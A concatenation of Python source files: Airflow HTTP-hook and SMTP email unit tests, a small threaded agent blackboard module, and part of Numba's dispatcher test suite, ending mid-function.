@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='http')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='https')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='http://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='https://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_subtype='mixed'
)
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
agentspace.py
|
import threading
import time
class Block:
def __init__(self):
self.value = None
self.validity = 0.0
self.priority = 0.0
self.registered = []
def valid(self):
if self.value is None:
return False
return self.validity == 0.0 or self.validity > time.time()
def set(self,value,validity,priority):
if (not self.valid()) or self.priority <= priority:
self.value = value;
self.validity = 0.0 if validity == 0.0 else validity + time.time()
self.priority = priority
return True
else:
return False
def register(self,agent):
self.registered.append(agent)
class Space:
blocks = dict()
def __init__(self):
pass
def read(name, dflt):
if name in Space.blocks:
if Space.blocks[name].valid():
return Space.blocks[name].value
else:
return dflt
else:
return dflt
def write(name, value, validity=0.0, priority=0.0):
#print(name,"=",value)
if not name in Space.blocks:
Space.blocks[name] = Block()
if Space.blocks[name].set(value,validity,priority):
for agent in Space.blocks[name].registered[:]:
if agent.stopped:
Space.blocks[name].registered.remove(agent)
else:
agent.trigger()
def register(name,agent):
if not name in Space.blocks:
Space.blocks[name] = Block()
Space.blocks[name].register(agent)
class Agent:
def __init__(self):
self.stopped = False
self.event = threading.Event()
self.timer = None
self.t = threading.Thread(name="agent", target=self.run)
self.t.start()
def attach_trigger(self,name):
Space.register(name,self)
def attach_timer(self,period):
self.period = period
self.timer = threading.Timer(self.period,self.timered_trigger)
self.timer.daemon = True
self.timer.start()
def timered_trigger(self):
self.trigger()
self.attach_timer(self.period)
def receive(self):
self.event.wait()
self.event.clear()
def trigger(self):
self.event.set()
def run(self):
self.init()
while not self.stopped:
self.receive()
if self.stopped:
break
self.senseSelectAct()
def init(self): # to be overiden
print('I am ready')
def senseSelectAct(self): # to be overiden
print('I am alive')
def stop(self):
if self.timer is not None:
self.timer.cancel()
self.stopped = True
self.trigger()
if __name__ == "__main__":
class Agent1(Agent):
def init(self):
self.attach_timer(1)
self.i = 0
def senseSelectAct(self):
print("agent 1 writes ",self.i)
Space.write("a",self.i)
self.i += 1
class Agent2(Agent):
def __init__(self,arg):
self.arg = arg
super().__init__()
def init(self):
self.attach_trigger("a")
def senseSelectAct(self):
i = Space.read("a",-1)
print("agent 2",self.arg,"reads ",i)
Space.write("a",3,validity=2,priority=1)
Space.write("a",4,priority=0)
time.sleep(1)
print(Space.read("a",-1))
time.sleep(1.1)
print(Space.read("a",-1))
Space.write("a",4,priority=0)
print(Space.read("a",-1))
print("-----")
a1 = Agent1()
a2 = Agent2("x")
print('waiting for 10s')
time.sleep(10)
print('done')
a1.stop()
time.sleep(3)
a2.stop()
|
test_dispatcher.py
|
import errno
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import threading
import warnings
import inspect
import pickle
import weakref
from itertools import chain
from io import StringIO
import numpy as np
from numba import njit, jit, generated_jit, typeof
from numba.core import types, errors, codegen
from numba import _dispatcher
from numba.core.compiler import compile_isolated
from numba.core.errors import NumbaWarning
from numba.tests.support import (TestCase, temp_directory, import_dynamic,
override_env_config, capture_cache_log,
captured_stdout)
from numba.np.numpy_support import as_dtype
from numba.core.caching import _UserWideCacheLocator
from numba.core.dispatcher import Dispatcher
from numba.tests.support import (skip_parfors_unsupported, needs_lapack,
SerialMixin)
from numba.testing.main import _TIMEOUT as _RUNNER_TIMEOUT
import llvmlite.binding as ll
import unittest
from numba.parfors import parfor
_TEST_TIMEOUT = _RUNNER_TIMEOUT - 60.
try:
import jinja2
except ImportError:
jinja2 = None
try:
import pygments
except ImportError:
pygments = None
_is_armv7l = platform.machine() == 'armv7l'
def dummy(x):
return x
def add(x, y):
return x + y
def addsub(x, y, z):
return x - y + z
def addsub_defaults(x, y=2, z=3):
return x - y + z
def star_defaults(x, y=2, *z):
return x, y, z
def generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x, y):
return x + y
else:
def impl(x, y):
return x - y
return impl
def bad_generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x):
return x
else:
def impl(x, y=6):
return x - y
return impl
def dtype_generated_usecase(a, b, dtype=None):
if isinstance(dtype, (types.misc.NoneType, types.misc.Omitted)):
out_dtype = np.result_type(*(np.dtype(ary.dtype.name)
for ary in (a, b)))
elif isinstance(dtype, (types.DType, types.NumberClass)):
out_dtype = as_dtype(dtype)
else:
raise TypeError("Unhandled Type %s" % type(dtype))
def _fn(a, b, dtype=None):
return np.ones(a.shape, dtype=out_dtype)
return _fn
class BaseTest(TestCase):
jit_args = dict(nopython=True)
def compile_func(self, pyfunc):
def check(*args, **kwargs):
expected = pyfunc(*args, **kwargs)
result = f(*args, **kwargs)
self.assertPreciseEqual(result, expected)
f = jit(**self.jit_args)(pyfunc)
return f, check
def check_access_is_preventable():
# This exists to check whether it is possible to prevent access to
# a file/directory through the use of `chmod 500`. If a user has
# elevated rights (e.g. root) then writes are likely to be possible
# anyway. Tests that require functioning access prevention are
# therefore skipped based on the result of this check.
tempdir = temp_directory('test_cache')
test_dir = (os.path.join(tempdir, 'writable_test'))
os.mkdir(test_dir)
# assume access prevention is not possible
ret = False
# check a write is possible
with open(os.path.join(test_dir, 'write_ok'), 'wt') as f:
f.write('check1')
# now forbid access
os.chmod(test_dir, 0o500)
try:
with open(os.path.join(test_dir, 'write_forbidden'), 'wt') as f:
f.write('check2')
except (OSError, IOError) as e:
# Check that the cause of the exception is due to access/permission
# as per
# https://github.com/conda/conda/blob/4.5.0/conda/gateways/disk/permissions.py#L35-L37 # noqa: E501
eno = getattr(e, 'errno', None)
if eno in (errno.EACCES, errno.EPERM):
# errno reports access/perm fail so access prevention via
# `chmod 500` works for this user.
ret = True
finally:
os.chmod(test_dir, 0o775)
shutil.rmtree(test_dir)
return ret
_access_preventable = check_access_is_preventable()
_access_msg = "Cannot create a directory to which writes are preventable"
skip_bad_access = unittest.skipUnless(_access_preventable, _access_msg)
class TestDispatcher(BaseTest):
def test_equality(self):
@jit
def foo(x):
return x
@jit
def bar(x):
return x
# Written this way to verify `==` returns a bool (gh-5838). Using
# `assertTrue(foo == foo)` or `assertEqual(foo, foo)` would defeat the
# purpose of this test.
self.assertEqual(foo == foo, True)
self.assertEqual(foo == bar, False)
self.assertEqual(foo == None, False) # noqa: E711
def test_dyn_pyfunc(self):
@jit
def foo(x):
return x
foo(1)
[cr] = foo.overloads.values()
# __module__ must be match that of foo
self.assertEqual(cr.entry_point.__module__, foo.py_func.__module__)
def test_no_argument(self):
@jit
def foo():
return 1
# Just make sure this doesn't crash
foo()
def test_coerce_input_types(self):
# Issue #486: do not allow unsafe conversions if we can still
# compile other specializations.
c_add = jit(nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
self.assertPreciseEqual(c_add(12.3, 45.6), add(12.3, 45.6))
self.assertPreciseEqual(c_add(12.3, 45.6j), add(12.3, 45.6j))
self.assertPreciseEqual(c_add(12300000000, 456), add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = jit('(i4, i4)', nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
# Implicit (unsafe) conversion of float to int
self.assertPreciseEqual(c_add(12.3, 45.6), add(12, 45))
with self.assertRaises(TypeError):
# Implicit conversion of complex to int disallowed
c_add(12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
@jit
def foo(a, b):
return a + b
INT = 1
FLT = 1.5
self.assertAlmostEqual(foo(INT, FLT), INT + FLT)
self.assertEqual(len(foo.overloads), 1)
self.assertAlmostEqual(foo(FLT, INT), FLT + INT)
self.assertEqual(len(foo.overloads), 2)
self.assertAlmostEqual(foo(FLT, FLT), FLT + FLT)
self.assertEqual(len(foo.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
self.assertAlmostEqual(foo(1, 1), INT + INT)
self.assertEqual(len(foo.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@jit
def foo(x):
return x + 1
def wrapper():
try:
self.assertEqual(foo(1), 2)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_explicit_signatures(self):
f = jit("(int64,int64)")(add)
# Approximate match (unsafe conversion)
self.assertPreciseEqual(f(1.5, 2.5), 3)
self.assertEqual(len(f.overloads), 1, f.overloads)
f = jit(["(int64,int64)", "(float64,float64)"])(add)
# Exact signature matches
self.assertPreciseEqual(f(1, 2), 3)
self.assertPreciseEqual(f(1.5, 2.5), 4.0)
# Approximate match (int32 -> float64 is a safe conversion)
self.assertPreciseEqual(f(np.int32(1), 2.5), 3.5)
# No conversion
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertIn("No matching definition", str(cm.exception))
self.assertEqual(len(f.overloads), 2, f.overloads)
# A more interesting one...
f = jit(["(float32,float32)", "(float64,float64)"])(add)
self.assertPreciseEqual(f(np.float32(1), np.float32(2**-25)), 1.0)
self.assertPreciseEqual(f(1, 2**-25), 1.0000000298023224)
# Fail to resolve ambiguity between the two best overloads
f = jit(["(float32,float64)",
"(float64,float32)",
"(int64,int64)"])(add)
with self.assertRaises(TypeError) as cm:
f(1.0, 2.0)
# The two best matches are output in the error message, as well
# as the actual argument types.
self.assertRegexpMatches(
str(cm.exception),
r"Ambiguous overloading for <function add [^>]*> "
r"\(float64, float64\):\n"
r"\(float32, float64\) -> float64\n"
r"\(float64, float32\) -> float64"
)
# The integer signature is not part of the best matches
self.assertNotIn("int64", str(cm.exception))
def test_signature_mismatch(self):
tmpl = ("Signature mismatch: %d argument types given, but function "
"takes 2 arguments")
with self.assertRaises(TypeError) as cm:
jit("()")(add)
self.assertIn(tmpl % 0, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,)")(add)
self.assertIn(tmpl % 1, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,intc,intc)")(add)
self.assertIn(tmpl % 3, str(cm.exception))
# With forceobj=True, an empty tuple is accepted
jit("()", forceobj=True)(add)
with self.assertRaises(TypeError) as cm:
jit("(intc,)", forceobj=True)(add)
self.assertIn(tmpl % 1, str(cm.exception))
def test_matching_error_message(self):
f = jit("(intc,intc)")(add)
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertEqual(str(cm.exception),
"No matching definition for argument type(s) "
"complex128, complex128")
def test_disabled_compilation(self):
@jit
def foo(a):
return a
foo.compile("(float32,)")
foo.disable_compile()
with self.assertRaises(RuntimeError) as raises:
foo.compile("(int32,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 1)
def test_disabled_compilation_through_list(self):
@jit(["(float32,)", "(int32,)"])
def foo(a):
return a
with self.assertRaises(RuntimeError) as raises:
foo.compile("(complex64,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 2)
def test_disabled_compilation_nested_call(self):
@jit(["(intp,)"])
def foo(a):
return a
@jit
def bar():
foo(1)
foo(np.ones(1)) # no matching definition
with self.assertRaises(TypeError) as raises:
bar()
m = "No matching definition for argument type(s) array(float64, 1d, C)"
self.assertEqual(str(raises.exception), m)
def test_fingerprint_failure(self):
"""
Failure in computing the fingerprint cannot affect a nopython=False
function. On the other hand, with nopython=True, a ValueError should
be raised to report the failure with fingerprint.
"""
@jit
def foo(x):
return x
# Empty list will trigger failure in compile_fingerprint
errmsg = 'cannot compute fingerprint of empty list'
with self.assertRaises(ValueError) as raises:
_dispatcher.compute_fingerprint([])
self.assertIn(errmsg, str(raises.exception))
# It should work in fallback
self.assertEqual(foo([]), [])
# But, not in nopython=True
strict_foo = jit(nopython=True)(foo.py_func)
with self.assertRaises(ValueError) as raises:
strict_foo([])
self.assertIn(errmsg, str(raises.exception))
# Test in loop lifting context
@jit
def bar():
object() # force looplifting
x = []
for i in range(10):
x = foo(x)
return x
self.assertEqual(bar(), [])
# Make sure it was looplifted
[cr] = bar.overloads.values()
self.assertEqual(len(cr.lifted), 1)
def test_serialization(self):
"""
Test serialization of Dispatcher objects
"""
@jit(nopython=True)
def foo(x):
return x + 1
self.assertEqual(foo(1), 2)
# get serialization memo
memo = Dispatcher._memo
Dispatcher._recent.clear()
memo_size = len(memo)
# pickle foo and check memo size
serialized_foo = pickle.dumps(foo)
# increases the memo size
self.assertEqual(memo_size + 1, len(memo))
# unpickle
foo_rebuilt = pickle.loads(serialized_foo)
self.assertEqual(memo_size + 1, len(memo))
self.assertIs(foo, foo_rebuilt)
# do we get the same object even if we delete all the explicit
# references?
id_orig = id(foo_rebuilt)
del foo
del foo_rebuilt
self.assertEqual(memo_size + 1, len(memo))
new_foo = pickle.loads(serialized_foo)
self.assertEqual(id_orig, id(new_foo))
# now clear the recent cache
ref = weakref.ref(new_foo)
del new_foo
Dispatcher._recent.clear()
self.assertEqual(memo_size, len(memo))
# show that deserializing creates a new object
pickle.loads(serialized_foo)
self.assertIs(ref(), None)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_array_dispatch(self):
# for context see issue #2937
def foo(a):
return np.linalg.matrix_power(a, 1)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
# create some arrays as Cartesian production of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# The checks must be run in this order to create the dispatch key
# sequence that causes invalid dispatch noted in #2937.
# The first two should hit the cache as they are aligned, supported
# order and under 5 dimensions. The second two should end up in the
# fallback path as they are misaligned.
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
check("F_contig_misaligned", F_contig_misaligned)
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_immutability_in_array_dispatch(self):
# RO operation in function
def foo(a):
return np.sum(a)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
# create some arrays as Cartesian production of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a, disable_write_bit=False):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
if disable_write_bit:
a.flags.writeable = False
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# all of these should end up in the fallback path as they have no write
# bit set
check("C_contig_aligned", C_contig_aligned, disable_write_bit=True)
check("F_contig_aligned", F_contig_aligned, disable_write_bit=True)
check("C_contig_misaligned", C_contig_misaligned,
disable_write_bit=True)
check("F_contig_misaligned", F_contig_misaligned,
disable_write_bit=True)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_high_dimension_array_dispatch(self):
def foo(a):
return np.linalg.matrix_power(a[0, 0, 0, 0, :, :], 1)
jitfoo = jit(nopython=True)(foo)
def check_properties(arr, layout, aligned):
self.assertEqual(arr.flags.aligned, aligned)
if layout == "C":
self.assertEqual(arr.flags.c_contiguous, True)
if layout == "F":
self.assertEqual(arr.flags.f_contiguous, True)
n = 729
r = 3
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
# create some arrays as Cartesian production of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_aligned, 'C', True)
C_contig_misaligned = tmp[1:].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_misaligned, 'C', False)
F_contig_aligned = C_contig_aligned.T
check_properties(F_contig_aligned, 'F', True)
F_contig_misaligned = C_contig_misaligned.T
check_properties(F_contig_misaligned, 'F', False)
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).\
reshape(r, r, r, r, r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# these should all hit the fallback path as the cache is only for up to
# 5 dimensions
check("F_contig_misaligned", F_contig_misaligned)
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
def test_dispatch_recompiles_for_scalars(self):
# for context #3612, essentially, compiling a lambda x:x for a
# numerically wide type (everything can be converted to a complex128)
# and then calling again with e.g. an int32 would lead to the int32
# being converted to a complex128 whereas it ought to compile an int32
# specialization.
def foo(x):
return x
# jit and compile on dispatch for 3 scalar types, expect 3 signatures
jitfoo = jit(nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 3)
expected_sigs = [(types.complex128,), (types.int32,), (types.bool_,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
# now jit with signatures so recompilation is forbidden
# expect 1 signature and type conversion
jitfoo = jit([(types.complex128,)], nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 1)
expected_sigs = [(types.complex128,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
def test_dispatcher_raises_for_invalid_decoration(self):
# For context see https://github.com/numba/numba/issues/4750.
@jit(nopython=True)
def foo(x):
return x
with self.assertRaises(TypeError) as raises:
jit(foo)
err_msg = str(raises.exception)
self.assertIn(
"A jit decorator was called on an already jitted function", err_msg)
self.assertIn("foo", err_msg)
self.assertIn(".py_func", err_msg)
with self.assertRaises(TypeError) as raises:
jit(BaseTest)
err_msg = str(raises.exception)
self.assertIn("The decorated object is not a function", err_msg)
self.assertIn(f"{type(BaseTest)}", err_msg)
class TestSignatureHandling(BaseTest):
"""
Test support for various parameter passing styles.
"""
def test_named_args(self):
"""
Test passing named arguments to a dispatcher.
"""
f, check = self.compile_func(addsub)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# All calls above fall under the same specialization
self.assertEqual(len(f.overloads), 1)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected 3, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6)
self.assertIn("missing argument 'z'", str(cm.exception))
def test_default_args(self):
"""
Test omitting arguments with a default value.
"""
f, check = self.compile_func(addsub_defaults)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# Now omitting some values
check(3, z=10)
check(3, 4)
check(x=3, y=4)
check(3)
check(x=3)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected at least 1, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(y=6, z=7)
self.assertIn("missing argument 'x'", str(cm.exception))
def test_star_args(self):
"""
Test a compiled function with starargs in the signature.
"""
f, check = self.compile_func(star_defaults)
check(4)
check(4, 5)
check(4, 5, 6)
check(4, 5, 6, 7)
check(4, 5, 6, 7, 8)
check(x=4)
check(x=4, y=5)
check(4, y=5)
with self.assertRaises(TypeError) as cm:
f(4, 5, y=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, 5, z=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, x=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
class TestSignatureHandlingObjectMode(TestSignatureHandling):
"""
Sams as TestSignatureHandling, but in object mode.
"""
jit_args = dict(forceobj=True)
class TestGeneratedDispatcher(TestCase):
"""
Tests for @generated_jit.
"""
def test_generated(self):
f = generated_jit(nopython=True)(generated_usecase)
self.assertEqual(f(8), 8 - 5)
self.assertEqual(f(x=8), 8 - 5)
self.assertEqual(f(x=8, y=4), 8 - 4)
self.assertEqual(f(1j), 5 + 1j)
self.assertEqual(f(1j, 42), 42 + 1j)
self.assertEqual(f(x=1j, y=7), 7 + 1j)
def test_generated_dtype(self):
f = generated_jit(nopython=True)(dtype_generated_usecase)
a = np.ones((10,), dtype=np.float32)
b = np.ones((10,), dtype=np.float64)
self.assertEqual(f(a, b).dtype, np.float64)
self.assertEqual(f(a, b, dtype=np.dtype('int32')).dtype, np.int32)
self.assertEqual(f(a, b, dtype=np.int32).dtype, np.int32)
def test_signature_errors(self):
"""
Check error reporting when implementation signature doesn't match
generating function signature.
"""
f = generated_jit(nopython=True)(bad_generated_usecase)
# Mismatching # of arguments
with self.assertRaises(TypeError) as raises:
f(1j)
self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x)'",
str(raises.exception))
# Mismatching defaults
with self.assertRaises(TypeError) as raises:
f(1)
self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x, y=6)'",
str(raises.exception))
class TestDispatcherMethods(TestCase):
def test_recompile(self):
closure = 1
@jit
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2.5)
self.assertEqual(len(foo.signatures), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
# Everything was recompiled
self.assertEqual(len(foo.signatures), 2)
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3.5)
def test_recompile_signatures(self):
# Same as above, but with an explicit signature on @jit.
closure = 1
@jit("int32(int32)")
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3)
def test_inspect_llvm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
llvms = foo.inspect_llvm()
self.assertEqual(len(llvms), 3)
# make sure the function name shows up in the llvm
for llvm_bc in llvms.values():
# Look for the function name
self.assertIn("foo", llvm_bc)
# Look for the argument names
self.assertIn("explicit_arg1", llvm_bc)
self.assertIn("explicit_arg2", llvm_bc)
def test_inspect_asm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
asms = foo.inspect_asm()
self.assertEqual(len(asms), 3)
# make sure the function name shows up in the llvm
for asm in asms.values():
# Look for the function name
self.assertTrue("foo" in asm)
def _check_cfg_display(self, cfg, wrapper=''):
# simple stringify test
if wrapper:
wrapper = "{}{}".format(len(wrapper), wrapper)
module_name = __name__.split('.', 1)[0]
module_len = len(module_name)
prefix = r'^digraph "CFG for \'_ZN{}{}{}'.format(wrapper,
module_len,
module_name)
self.assertRegexpMatches(str(cfg), prefix)
